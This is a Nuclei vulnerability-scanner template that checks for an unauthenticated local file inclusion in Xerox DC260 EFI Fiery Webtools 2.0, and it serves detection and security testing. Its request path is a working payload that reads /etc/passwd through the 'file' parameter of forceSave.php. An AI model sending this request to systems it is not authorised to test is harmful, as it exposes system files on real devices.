nuclei-templates/http/vulnerabilities/other/xerox-efi-lfi.yaml

34 lines
1.1 KiB
YAML

id: xerox-efi-lfi
info:
name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion
author: gy741
severity: high
description: Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
- https://packetstormsecurity.com/files/145570
- https://www.exploit-db.com/exploits/43398/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: iot,xerox,disclosure,lfi,packetstorm,edb
metadata:
max-request: 1
http:
- method: GET
path:
- "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200